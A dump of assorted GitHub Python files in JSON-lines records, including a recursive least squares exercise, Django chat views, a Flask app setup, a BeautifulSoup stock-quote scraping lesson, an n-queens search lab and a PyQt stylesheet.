I.ravel()\r\nprint(H)\r\nx_ls = inv(H.T.dot(H)).dot(H.T.dot(V))\r\nprint('The slope and offset parameters of the best-fit line (i.e., the resistance and offset) are [R, b]:')\r\nprint(x_ls[0, 0])\r\nprint(x_ls[1, 0])\r\n\r\n# Plot line.\r\nI_line = np.arange(0, 0.8, 0.1).reshape(8, 1)\r\nV_line = x_ls[0]*I_line + x_ls[1]\r\n\r\nplt.scatter(I, V)\r\nplt.plot(I_line, V_line)\r\nplt.xlabel('Current (A)')\r\nplt.ylabel('Voltage (V)')\r\nplt.grid(True)\r\nplt.show()\r\n\r\n## Recursive Solution\r\n\r\n# Initialize the 2x1 parameter vector x (i.e., x_0).\r\nx_k = np.array([[4.6 , 0]]).T\r\n\r\n#print(x_k)\r\n\r\n#Initialize the 2x2 covaraince matrix (i.e. P_0). Off-diangonal elements should be zero.\r\nP_k = np.array([[9 , 0],[0, 0.2]])\r\n#print(\"P_k is\", P_k)\r\n# Our voltage measurement variance (denoted by R, don't confuse with resistance).\r\nR_k = np.array([[0.0225]])\r\n\r\n# Pre allocate space to save our estimates at every step.\r\nnum_meas = I.shape[0]\r\nprint(\"num_meas is\", num_meas)\r\nx_hist = np.zeros((num_meas + 1, 2)) \r\nP_hist = np.zeros((num_meas + 1, 2, 2))\r\n\r\nx_hist[0] = x_k.T #what to do here\r\nx_hist_t = np.zeros((2,1))\r\n#print(\"x_hist is\", x_hist)\r\nP_hist[0] = P_k\r\nId = np.identity(2)\r\n\r\n# Iterate over all the available measurements.\r\nfor k in range(num_meas):\r\n # Construct H_k (Jacobian).\r\n H_k = np.matrix(H[k]) #np.array does't work with .T \r\n #print(\"the value of k is\", k)\r\n #print(\"H_k trans is\", H_k.T)\r\n #print(\"P_hist[k-1] is\", P_hist[k-1])\r\n # Construct K_k (gain matrix).\r\n K_k = P_hist[k].dot(H_k.T)\r\n print(\"K_k is\", K_k) \r\n # Update our estimate.\r\n #print(\"new x_hist\", k, \"is\", x_hist[k])\r\n x_hist_t[0][0] = x_hist[k][0]\r\n x_hist_t[1][0] = x_hist[k][1]\r\n print(\"new x_hist_t is\", x_hist_t)\r\n x_k = x_hist_t + K_k.dot(V[k]-H_k.dot(x_hist_t))\r\n print(\"new x_k is\", x_k)\r\n # Update our uncertainty (covariance)\r\n P_k = (Id - K_k.dot(H_k)).dot(P_hist[k]).dot((Id - K_k.dot(H_k)).T) + K_k.dot(R_k).dot(K_k.T) \r\n print(\"new P_k is\", P_k) \r\n\r\n # Keep track of our history.\r\n P_hist[k + 1] = P_k\r\n x_hist[k + 1] = x_k.T\r\n \r\nprint('The slope and offset parameters of the best-fit line (i.e., the resistance and offset) are [R, b]:')\r\nprint(x_k)\r\nprint(x_k[0, 0])\r\nprint(x_k[1, 0])\r\n\r\nplt.scatter(I, V, label='Data')\r\nplt.plot(I_line, V_line, label='Batch Solution')\r\nplt.xlabel('Current (A)')\r\nplt.ylabel('Voltage (V)')\r\nplt.grid(True)\r\n\r\nI_line = np.arange(0, 0.8, 0.1).reshape(8, 1)\r\n\r\nfor k in range(num_meas):\r\n V_line = x_hist[k, 0]*I_line + x_hist[k, 1]\r\n plt.plot(I_line, V_line, label='Measurement {}'.format(k))\r\n\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n#signbed by Rishabh Singh","repo_name":"rish2911/Self-Driving-Cars-by-U-Toronto","sub_path":"recursive_least_squares.py","file_name":"recursive_least_squares.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34296642746","text":"\"\"\"\n\nDesigned and Developed by-\nUdayraj Deshmukh \nhttps://github.com/Udayraj123\n\n\"\"\"\nimport glob\nfrom PIL import Image\nin_dir = '../../outputs/checkedOMRs/'\nim1 = Image.open(\"inputs/gif/gif_start.jpg\")\nGAP = 200 #ms\nfor suffix1 in [\"JE/\",\"HE/\",\"JH/\",\"HH/\"]:\n\tfor suffix2 in [\"\",\"_MULTI_\",\"_BADSCAN_\"]:\n\t\tdir_glob =in_dir+suffix1 + suffix2+'/*.jpg'\n\t\tallOMRs= list(glob.iglob(dir_glob))\n\t\tif(len(allOMRs)):\n\t\t\tfilename = \"outputs/gif/checking_\"+suffix1[:-1] + suffix2+\".gif\"\n\t\t\tim1.save(filename, save_all=True, append_images=[Image.open(filepath) for filepath in allOMRs], duration=GAP*(2 if len(suffix2) else 1), loop=0)\n\t\t\tprint(\"Saved : \"+filename)\n\t\t# else:\n\t\t# \tprint(\"Empty glob: \"+dir_glob)\n","repo_name":"kapitsa2811/OMRChecker","sub_path":"extras/mini_scripts/make_gif.py","file_name":"make_gif.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"1480200259","text":"# coding=utf-8\nimport json\nfrom django.contrib import auth\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.shortcuts import redirect, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse, HttpResponseBadRequest\nfrom django.shortcuts import render\nfrom django.template.context_processors import csrf\nfrom django.views.generic import CreateView\nfrom jsonify.convert import jsonify\nimport simplejson\nfrom myapp.form import UserCreationForm\n\nfrom myapp.models import Message\n\n\n@login_required\ndef index(request):\n mes = Message.objects.all()\n context = {\n 'messages': mes,\n }\n return render(request, 'myapp/home.html', context)\n\n\ndef login(request):\n if request.user.is_authenticated():\n return HttpResponseRedirect('/')\n args = {}\n args.update(csrf(request))\n args['username'] = auth.get_user(request).username\n if request.POST:\n username = request.POST.get('username', '')\n password = request.POST.get('password', '')\n user = auth.authenticate(username=username, password=password)\n if user is not None:\n auth.login(request, user)\n return HttpResponseRedirect('/')\n else:\n args['login_error'] = u\"Пользователь не найден\"\n return render(request, 'myapp/login.html', args)\n else:\n return render(request, 'myapp/login.html', args)\n\n\ndef registr(request):\n args = {}\n args.update(csrf(request))\n args['form'] = UserCreationForm()\n if request.POST:\n newuser_form = UserCreationForm(request.POST)\n if newuser_form.is_valid():\n newuser_form.save()\n user = auth.authenticate(username=newuser_form.cleaned_data['username'],\n password=newuser_form.cleaned_data['password2'])\n auth.login(request, user)\n return redirect('/')\n else:\n args['login_error'] = \"Заполните все поля\"\n args['form'] = newuser_form\n return render(request, 'myapp/register.html', args)\n return render(request, 'myapp/register.html', args)\n\n\ndef logout(request):\n auth.logout(request)\n return redirect('/')\n\n\nclass Register(CreateView):\n form_class = UserCreationForm\n template_name = 'myapp/register.html'\n\n success_url = reverse_lazy('login')\n\n\ndef send_message(request):\n if request.method == \"POST\":\n q = request.POST.get('message', '')\n if q is not None:\n new = Message.objects.create(message=q, sender=request.user)\n new.save()\n return HttpResponse('')\n\n\ndef receive(request):\n args = []\n if request.method == \"POST\":\n post = request.POST.get('offset', '')\n mes = Message.objects.filter(pk__gt=post).order_by('pk')\n for i in mes:\n args.append({'id': i.id,\n 'message': i.message,\n 'sender': i.sender.username\n })\n\n arr = dict([('result', args)])\n #print(arr['result'])\n return HttpResponse(json.dumps(arr), content_type=\"application/json\")\n\n\ndef sync(request):\n args = {}\n m = Message.objects.order_by('-pk')\n if m:\n args['lmid'] = m[0].id\n else:\n args['lmid'] = 0\n return HttpResponse(json.dumps(args))\n","repo_name":"EugeniyMalakhov/Ajax-chat","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17686519672","text":"class Solution:\n def maxProfit(self, prices):\n prev_pointer = 0\n curr_pointer = 1\n max_profit = 0\n for i in range(len(prices)-1):\n if prices[prev_pointer]= len(input_seq):\r\n return True\r\n if input_seq[index] in word_dict.keys():\r\n for i in word_dict[input_seq[index]]:\r\n fail = False\r\n for j in range(len(i)):\r\n if index + len(i) < length_seq:\r\n if input_seq[index + j] != i[j]:\r\n fail = True\r\n break\r\n else:\r\n fail = True\r\n break\r\n if not fail:\r\n if helper(input_seq, word_dict, dp, index + j + 1):\r\n return True\r\n return False\r\n\r\ndef word_break(input_seq, words):\r\n word_dict = {}\r\n dp = {}\r\n for i in range(len(words)):\r\n if words[i][0] in word_dict.keys():\r\n word_dict[words[i][0]].append(words[i])\r\n else:\r\n word_dict[words[i][0]] = [words[i]]\r\n return helper(input_seq, word_dict, dp, 0)\r\ninput_string =\"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab\"\r\nword = [\"a\",\"aa\",\"aaa\",\"aaaa\",\"aaaaa\",\"aaaaaa\",\"aaaaaaa\",\"aaaaaaaa\",\"aaaaaaaaa\",\"aaaaaaaaaa\"]\r\nprint(word_break(input_string, word))\r\n#print(word_break(\"catsandog\", [\"cats\", \"dog\", \"sand\", \"and\", \"cat\",\"og\"]))","repo_name":"raymoss/Algorithms","sub_path":"word_break_139.py","file_name":"word_break_139.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25999539559","text":"import dis\n\ndef f(l, b):\n counter = 0\n x = 0\n while counter < 3:\n x = x + l\n x = x + b\n counter += 1\n return x\n\n# def f2(m):\n# import turtle\n# turle.forward(55)\ndef bitcode():\n print(dis.dis(f))\nprint(dis.dis(bitcode))","repo_name":"sidshastry/firstrepo","sub_path":"pyplay/disasm.py","file_name":"disasm.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1286818851","text":"from pyglet.gl import *\nfrom pyglet import image\nimport ctypes\nimport matplotlib\nfrom PIL import Image\n\n\nclass Texture:\n def __init__(self, path, type=\"path\"):\n self.texture = path if type == \"image\" else Image.open(path).transpose(Image.FLIP_TOP_BOTTOM)\n if self.texture.mode == \"RGB\":\n self.texture.putalpha(255)\n self.texture_id = ctypes.c_uint32()\n glGenTextures(1, self.texture_id)\n glBindTexture(GL_TEXTURE_2D, self.texture_id)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER,\n GL_LINEAR)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER,\n GL_LINEAR)\n glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA8, self.texture.width,\n self.texture.height, 0, GL_RGBA, GL_UNSIGNED_BYTE, self.texture.tobytes())\n glBindTexture(GL_TEXTURE_2D, 0)\n\n def clean_up(self):\n glDeleteTextures(1, self.texture_id)","repo_name":"SupreetTadeparti/TerrainGeneration","sub_path":"texture.py","file_name":"texture.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"22473436543","text":"# 3rd-party packages\r\nfrom flask import Flask, render_template, request, redirect, url_for\r\nfrom flask_mongoengine import MongoEngine\r\nfrom flask_login import (\r\n LoginManager,\r\n current_user,\r\n login_user,\r\n logout_user,\r\n login_required,\r\n)\r\nfrom flask_bcrypt import Bcrypt\r\nfrom werkzeug.utils import secure_filename\r\n\r\nfrom flask_talisman import Talisman\r\n\r\n# stdlib\r\nfrom datetime import datetime\r\nimport os\r\n\r\n\r\n\r\n\r\ndb = MongoEngine()\r\nlogin_manager = LoginManager()\r\nbcrypt = Bcrypt()\r\n\r\n\r\n\r\nfrom .users.routes import users\r\nfrom .store.routes import store\r\n\r\n\r\ndef page_not_found(e):\r\n return render_template(\"404.html\"), 404\r\n\r\n\r\n\r\n\r\ndef create_app(test_config=None):\r\n app = Flask(__name__)\r\n \r\n\r\n app.config[\"SECRET_KEY\"] = b'\\x020;yr\\x91\\x11\\xbe\"\\x9d\\xc1\\x14\\x91\\xadf\\xec'\r\n app.config[\"MONGODB_HOST\"] = os.getenv(\"MONGODB_HOST\")\r\n\r\n db.init_app(app)\r\n login_manager.init_app(app)\r\n bcrypt.init_app(app)\r\n\r\n app.register_blueprint(users)\r\n app.register_error_handler(404, page_not_found)\r\n\r\n app.register_blueprint(store)\r\n app.register_error_handler(404, page_not_found)\r\n\r\n login_manager.login_view = \"users.login\"\r\n\r\n\r\n csp = {\r\n 'default-src': '\\'self\\'',\r\n 'img-src': ['*.fakestoreapi.com', '*.pngimage.net'],\r\n 'script-src': ['*', \"'unsafe-inline'\"],\r\n 'style-src': ['*', \"'unsafe-inline'\"]\r\n }\r\n \r\n Talisman(app, content_security_policy=csp)\r\n\r\n\r\n return app\r\n","repo_name":"ishand2000/cmsc388J-ecommerce-website","sub_path":"flask_app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39114583390","text":"# To add a new cell, type '#%%'\n# To add a new markdown cell, type '#%% [markdown]'\n\n#%% [markdown]\n# # Web scraping\n#\n# Our goal here is to learn\n# * Basic HTML structure\n# * Basic CSS structure and selector rules\n# * Basic webpage inspection tools from browsers\n# * Use of BeautifulSoup or other web scraping libraries, plus parsers\n\n#%%\nimport numpy as np\nimport pandas as pd\n# import matplotlib.pyplot as plt\n# plt.style.use('classic')\n\n#%%\n# We can use Python library \"requests\" to download the html file (via a GET request to the web server). \nimport requests\n# You can get a list of attributes and methods for the python requests object from w3school very handy\n# https://www.w3schools.com/python/ref_requests_response.asp\n\n\n#%%\nmyportfolio = ( 'MSFT', 'AAPL', 'GOOG' )\nurl = 'https://money.cnn.com/quote/quote.html?symb=MSFT' # we aim to loop thru our portfolio later when things are working\nthispage = requests.get(url)\nprint(thispage)\n# a response object, with status_code [200] means successful. It could be a blank page or error page, however...\nprint(thispage.status_code)\n# a status code starting with a 2 generally indicates success, and a code starting with a 4 or a 5 indicates an error.\n\n#%%\n# To get the html body (and head) from the response object, we can use\nprint(thispage.content)\n# The results typically should be like this\n# b'\\n ...\n# The starting 'b' character indicates it's in bytes, where as \nprint(thispage.text)\n# will be in unicodes\n\n# These are what you would see from \"downloading\" or \"inspecting\" a webpage in chrome/firefox/safari/etc.\n# Try that.\n\n#%%\n# Next step is to use some kind of parsers to parse the HTML codes into standard tree-like or object-like structure (HTML DOM Document-Object-Model)\n\n# Useful to have basic HTML knowledge, the (XML) structure\n\n# CSS (Cascade Style Sheet) is also an integral part of most HTML design these days.\n\n# Most parsers can use CSS-style selectors, as well as Xpaths\n\n#%%\n# We will use the library beautifulSoup with the default parser lxml. Another common one is the scrapy library.\n# Need to install for the first time:\n# pip install bs4\n# or pip3 install bs4\n# Beautiful Soup also relies on a parser, the default is lxml. \n# You might already have itYou may already have it. \n# If not, do: $ pip install lxml or $ apt-get install python-lxml.\n# We can also use html.parser, or html5lib\nfrom bs4 import BeautifulSoup\n\n#%%\n# soup = BeautifulSoup(thispage.content, 'lxml')\n# soup = BeautifulSoup(thispage.content, 'html.parser')\nsoup = BeautifulSoup(thispage.content, 'html5lib')\n\n#%%\nprint(soup.prettify())\n\n#%% \n# What is the structure of soup?\nsoupkids = list(soup.children)\nprint(len(soupkids)) # length of 3 if html.parser is used, or 2 if lxml or html5.lib is used.\n# soupkids = ['HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"', '\\n', ...\n\n# Use list comprehension to see what is in the list\n[type(item) for item in soupkids]\n\n#%%\nprint(soupkids[0]) # HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\n#%%\nprint(soupkids[1]) # the actual html document that we really care about\n\n#%%\nthecontent = soupkids[1] # the html codes itself\n\n#%%\n# break this object (bs4.element.Tag) up further\nthehtml = list(thecontent.children)\nprint(len(thehtml)) # length of 3 \n# thehtml = [ <head> <title> ..., '\\n' , <body> ... ]\n\n# Use list comprehension to see what is in the list\n[type(item) for item in thehtml]\n\n#%%\n# For our purpose, we want the info inside the body\nthebody = thehtml[2]\n\n#%%\n# break this object (bs4.element.Tag) up further\nthebodychildren = list(thebody.children)\nprint(len(thebodychildren)) # length of 3 \n# thebodychildren = [ <head> <title> ..., '\\n' , <body> ... ]\n\n# Use list comprehension to see what is in the list\n[type(item) for item in thebodychildren]\n\n#%%\n# STOP\n# Won't work like that except for very simple sites\n# Let rewind and start from the beginning with soup\n# soup = BeautifulSoup(thispage.content, 'html5lib')\n\n# know what you want to find. Use .find() or .find_all()\nfoundlast = soup.find('td', class_='wsod_last')\nprint(foundlast)\nprint(foundlast.text) # almost got it\n\n#%%\n# Try\nprint(list(foundlast.children)) # Here you are, the quote, in the first element of the list\nprint(list(foundlast.children)[0].text) # the stock quote \n\n\n#%%\n# Also try to use CSS selectors\n# Use dot . for className, use # for id\nselectlast = soup.select('tr td.wsod_last span') \nselectlast[0].text\n# Or if we know for sure there is only one, or just want the first one, we can do\n# selectlast = soup.select_one('tr td.wsod_last span') # return a single node instead of a list\n# selectlast.text\n\n\n#%%\n# myportfolio = ( 'MSFT', 'AAPL', 'GOOG' )\n\n# So with all these hard work, we can now streamline all these into a combined function call\nimport requests\nfrom bs4 import BeautifulSoup\ndef getStockQuote(stocksymbol):\n sourcemain = 'https://money.cnn.com/quote/quote.html?symb='\n url = sourcemain + stocksymbol.upper()\n thispage = requests.get(url)\n # soup = BeautifulSoup(thispage.content, 'lxml')\n # soup = BeautifulSoup(thispage.content, 'html.parser')\n soup = BeautifulSoup(thispage.content, 'html5lib')\n selectlast = soup.select_one('tr td.wsod_last span') # return a single node instead of a list\n return float(selectlast.text)\n\n\n#%%\n# Testing...\ngetStockQuote('aapl') # works\ngetStockQuote('silly') # error\n# try to make your codes fool-proof\n\n#%%\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef getStockQuote(stocksymbol):\n sourcemain = 'https://money.cnn.com/quote/quote.html?symb='\n url = sourcemain + stocksymbol.upper()\n thispage = requests.get(url) # thispage.status_code is still 200 whether the stock symbol exists or not. \n # soup = BeautifulSoup(thispage.content, 'lxml')\n # soup = BeautifulSoup(thispage.content, 'html.parser')\n soup = BeautifulSoup(thispage.content, 'html5lib')\n selectlast = soup.select('tr td.wsod_last span') # return a list\n return float(selectlast[0].text) if (len(selectlast)==1) else -1 # or anything that you can flag easily. I try to keep the return value numeric. Another option would be return np.nan\n\n# Now it works for 'silly'\n\n\n\n# %%\n","repo_name":"Kelv1nYu/Courses_GWU","sub_path":"IntroToDataMining/Classes/Class08_WebScraping/InClass08_WebScraping_changed.py","file_name":"InClass08_WebScraping_changed.py","file_ext":"py","file_size_in_byte":6150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17671046705","text":"import numpy\nfrom copy import deepcopy\n\n'''\nThe conditions of this latin square resemble the n queens problem.\n'''\n\n\nclass State:\n def __init__(self, matrix, level):\n self.matrix = matrix\n self.n = len(matrix)\n # This field is meant to help with keeping track of the number of queens that are already placed on the table\n self.level = level\n\n def isValid(self):\n columns = [[] for _ in range(self.n)]\n rows = [[] for _ in range(self.n)]\n forwardDiagonals = [[] for _ in range(self.n * 2 - 1)]\n backwardDiagonals = [[] for _ in range(self.n * 2 - 1)]\n\n for x in range(self.n):\n for y in range(self.n):\n columns[x].append(self.matrix[y][x])\n rows[y].append(self.matrix[y][x])\n forwardDiagonals[x + y].append(self.matrix[y][x])\n backwardDiagonals[x - y + self.n - 1].append(self.matrix[y][x])\n\n # check rows\n for row in rows:\n if numpy.count_nonzero(row) > 1:\n return False\n\n # check columns\n for column in columns:\n if numpy.count_nonzero(column) > 1:\n return False\n\n # check diagonals\n for diagonal in forwardDiagonals:\n if numpy.count_nonzero(diagonal) > 1:\n return False\n\n for diagonal in backwardDiagonals:\n if numpy.count_nonzero(diagonal) > 1:\n return False\n\n return True\n\n def getRemainingValidPositions(self):\n copyMatrix = deepcopy(self.matrix)\n\n for i in range(self.n):\n for j in range(self.n):\n if copyMatrix[i][j] == 1:\n # Marking the line and column\n for k in range(self.n):\n if copyMatrix[k][j] == 0:\n copyMatrix[k][j] = 2\n if copyMatrix[i][k] == 0:\n copyMatrix[i][k] = 2\n\n # Marking the diagonals\n indexSum = i + j\n for i2 in range(self.n):\n j2 = indexSum - i2\n if 0 <= j2 < self.n and copyMatrix[i2][j2] == 0:\n copyMatrix[i2][j2] = 2\n\n indexDiff = i - j\n for i2 in range(self.n):\n j2 = i2 - indexDiff\n if 0 <= j2 < self.n and copyMatrix[i2][j2] == 0:\n copyMatrix[i2][j2] = 2\n\n # Counting unmarked positions\n count = 0\n for line in copyMatrix:\n count += self.n - numpy.count_nonzero(line)\n return count\n\n def generateNextStates(self):\n # The idea here is that each new state is generated by placing each new \"queen\" on every possible position on the next new line, therefore applying some of the problem restrictions directly \"on the go\"\n # Another possibility could have been just adding a new queen on every possible position on the whole table, I guess, and \"ignore\" the restrictions when building the tree, but that seems extremely inefficient\n\n # When we reach a leaf, we stop generating\n if self.level == self.n:\n return\n\n states = []\n for i in range(self.n):\n child = deepcopy(self.matrix)\n child[self.level][i] = 1\n state = State(child, self.level + 1)\n states.append(state)\n\n return states\n\n def printState(self):\n s = \"\"\n for row in self.matrix:\n for piece in row:\n s += str(piece) + \" \"\n s += \"\\n\"\n print(s)\n\n\nclass Problem:\n def __init__(self, state):\n self.initialState = state\n # We don't know how the state we want to reach looks like, so it stays like this for now\n self.finalState = None\n\n @staticmethod\n def expand(state):\n return state.generateNextStates()\n\n def heuristic(self, state):\n # An idea here for comparing states would be looking for the number of \"unattacked\" squares for each configuration and see which one provides the most spaces that are not attacked by a queen\n # However, I believe the issue appears in the greedy algorithm, because it seems impossible to pick the best position to put the first queen\n return state.getRemainingValidPositions()\n\n\nclass Controller:\n def __init__(self):\n self.problem = None\n\n def setProblem(self, problem):\n self.problem = problem\n\n def dfs(self):\n path = []\n stack = [self.problem.initialState]\n while len(stack) > 0:\n currentState = stack.pop()\n path.append(currentState)\n\n if currentState.level == currentState.n:\n print(\"PATH:\")\n for elem in path:\n elem.printState()\n print(\"Solution found\")\n return\n\n nextStates = self.problem.expand(currentState)\n validStates = []\n for state in nextStates:\n if state.isValid():\n validStates.append(state)\n\n # For efficiency reasons, I add to the stack only the next states that are valid, instead of checking only the leaves\n for state in reversed(validStates):\n stack.append(state)\n\n print(\"PATH:\")\n for elem in path:\n elem.printState()\n print(\"Solution not found\")\n return\n\n def greedy(self):\n path = []\n stack = [self.problem.initialState]\n while len(stack) > 0:\n currentState = stack.pop()\n path.append(currentState)\n\n if currentState.level == currentState.n:\n print(\"Solution found\")\n print(\"PATH:\")\n for elem in path:\n elem.printState()\n return\n\n nextStates = self.problem.expand(currentState)\n validStates = []\n for state in nextStates:\n if state.isValid():\n validStates.append(state)\n\n if len(validStates) > 0:\n # Here, I look only for the best next state\n bestState = validStates[0]\n bestValue = self.problem.heuristic(bestState)\n for state in validStates:\n currentValue = self.problem.heuristic(state)\n if currentValue > bestValue:\n bestState = state\n bestValue = currentValue\n\n stack.append(bestState)\n print(\"Solution not found\")\n print(\"PATH:\")\n for elem in path:\n elem.printState()\n return\n\n def bestFS(self):\n path = []\n stack = [self.problem.initialState]\n while len(stack) > 0:\n currentState = stack.pop()\n path.append(currentState)\n\n if currentState.level == currentState.n:\n print(\"PATH:\")\n for elem in path:\n elem.printState()\n return\n\n nextStates = self.problem.expand(currentState)\n validStates = []\n for state in nextStates:\n if state.isValid():\n validStates.append(state)\n\n\n validStates.sort(key=lambda x: self.problem.heuristic(x))\n stack += validStates\n\n print(\"PATH:\")\n for elem in path:\n elem.printState()\n return\n\n\nclass UI:\n def __init__(self):\n self.controller = Controller()\n\n def showMenu(self):\n print(\"Choose method\")\n print(\"1. DFS\")\n print(\"2. Greedy\")\n print(\"3. BestFS\")\n\n def run(self):\n n = int(input(\"Board size: \"))\n board = [[0 for col in range(n)] for row in range(n)]\n initialState = State(board, 0)\n problem = Problem(initialState)\n self.controller.setProblem(problem)\n self.showMenu()\n\n method = int(input())\n if method == 1:\n self.controller.dfs()\n elif method == 2:\n self.controller.greedy()\n elif method == 3:\n self.controller.bestFS()\n\n\nui = UI()\nui.run()\n","repo_name":"the-coding-cloud/UBB","sub_path":"Year II/Sem II/AI/Lab2_Updated/Lab2.py","file_name":"Lab2.py","file_ext":"py","file_size_in_byte":8222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"13433532827","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom datetime import datetime\nfrom PyQt5.QtWidgets import QAbstractItemView, QWidget\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(700, 400)\n MainWindow.setStyleSheet(\"/*\\n\"\n\"ElegantDark Style Sheet for QT Applications\\n\"\n\"Author: Jaime A. Quiroga P.\\n\"\n\"Company: GTRONICK\\n\"\n\"Last updated: 17/04/2018\\n\"\n\"Available at: https://github.com/GTRONICK/QSS/blob/master/ElegantDark.qss\\n\"\n\"*/\\n\"\n\"QMainWindow {\\n\"\n\" background-color:rgb(82, 82, 82);\\n\"\n\"}\\n\"\n\"QTextEdit {\\n\"\n\" background-color:rgb(42, 42, 42);\\n\"\n\" color: rgb(0, 255, 0);\\n\"\n\"}\\n\"\n\"QPushButton{\\n\"\n\" border-style: outset;\\n\"\n\" border-width: 2px;\\n\"\n\" border-top-color: qlineargradient(spread:pad, x1:0.5, y1:0.6, x2:0.5, y2:0.4, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-right-color: qlineargradient(spread:pad, x1:0.4, y1:0.5, x2:0.6, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-left-color: qlineargradient(spread:pad, x1:0.6, y1:0.5, x2:0.4, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-bottom-color: rgb(58, 58, 58);\\n\"\n\" border-bottom-width: 1px;\\n\"\n\" border-style: solid;\\n\"\n\" color: rgb(255, 255, 255);\\n\"\n\" padding: 2px;\\n\"\n\" background-color: qlineargradient(spread:pad, x1:0.5, y1:1, x2:0.5, y2:0, stop:0 rgba(77, 77, 77, 255), stop:1 rgba(97, 97, 97, 255));\\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\" border-style: outset;\\n\"\n\" border-width: 2px;\\n\"\n\" border-top-color: qlineargradient(spread:pad, x1:0.5, y1:0.6, x2:0.5, y2:0.4, stop:0 rgba(180, 180, 180, 255), stop:1 rgba(110, 110, 110, 255));\\n\"\n\" border-right-color: qlineargradient(spread:pad, x1:0.4, y1:0.5, x2:0.6, y2:0.5, stop:0 rgba(180, 180, 180, 255), stop:1 rgba(110, 110, 110, 255));\\n\"\n\" border-left-color: qlineargradient(spread:pad, x1:0.6, y1:0.5, x2:0.4, y2:0.5, stop:0 rgba(180, 180, 180, 255), stop:1 rgba(110, 110, 110, 255));\\n\"\n\" border-bottom-color: rgb(115, 115, 115);\\n\"\n\" border-bottom-width: 1px;\\n\"\n\" border-style: solid;\\n\"\n\" color: rgb(255, 255, 255);\\n\"\n\" padding: 2px;\\n\"\n\" background-color: qlineargradient(spread:pad, x1:0.5, y1:1, x2:0.5, y2:0, stop:0 rgba(107, 107, 107, 255), stop:1 rgba(157, 157, 157, 255));\\n\"\n\"}\\n\"\n\"QPushButton:pressed{\\n\"\n\" border-style: outset;\\n\"\n\" border-width: 2px;\\n\"\n\" border-top-color: qlineargradient(spread:pad, x1:0.5, y1:0.6, x2:0.5, y2:0.4, stop:0 rgba(62, 62, 62, 255), stop:1 rgba(22, 22, 22, 255));\\n\"\n\" border-right-color: qlineargradient(spread:pad, x1:0.4, y1:0.5, x2:0.6, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-left-color: qlineargradient(spread:pad, x1:0.6, y1:0.5, x2:0.4, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-bottom-color: rgb(58, 58, 58);\\n\"\n\" border-bottom-width: 1px;\\n\"\n\" border-style: solid;\\n\"\n\" color: rgb(255, 255, 255);\\n\"\n\" padding: 2px;\\n\"\n\" background-color: qlineargradient(spread:pad, x1:0.5, y1:1, x2:0.5, y2:0, stop:0 rgba(77, 77, 77, 255), stop:1 rgba(97, 97, 97, 255));\\n\"\n\"}\\n\"\n\"QPushButton:disabled{\\n\"\n\" border-style: outset;\\n\"\n\" border-width: 2px;\\n\"\n\" border-top-color: qlineargradient(spread:pad, x1:0.5, y1:0.6, x2:0.5, y2:0.4, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-right-color: qlineargradient(spread:pad, x1:0.4, y1:0.5, x2:0.6, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-left-color: qlineargradient(spread:pad, x1:0.6, y1:0.5, x2:0.4, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-bottom-color: rgb(58, 58, 58);\\n\"\n\" border-bottom-width: 1px;\\n\"\n\" border-style: solid;\\n\"\n\" color: rgb(0, 0, 0);\\n\"\n\" padding: 2px;\\n\"\n\" background-color: qlineargradient(spread:pad, x1:0.5, y1:1, x2:0.5, y2:0, stop:0 rgba(57, 57, 57, 255), stop:1 